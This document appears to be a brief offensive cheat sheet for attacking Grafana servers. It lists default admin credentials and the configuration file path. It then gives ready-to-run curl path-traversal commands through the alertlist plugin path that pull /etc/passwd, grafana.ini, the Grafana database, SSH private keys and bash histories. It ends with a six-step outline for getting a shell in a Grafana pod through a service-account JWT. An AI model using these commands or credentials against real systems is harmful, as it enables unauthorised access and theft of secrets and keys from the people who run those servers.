Grafana Pentesting
Default Credential
admin:admin
admin:prom-operatorConfiguration File
/etc/grafana/grafana.iniPath Traversal
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.bash_history
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.bash_historyGetting a Shell vis JWT, Grafana Pod
1. Check Environment Variables on the Target Machine
2. Access the Grafana Dashboard
3. Get the JWT of the Service Account
4. Decode the JWT and Get Sensitive Information
5. Check Your Permission of This Service
6. Get a Shell on the Grafana Pod
Last updated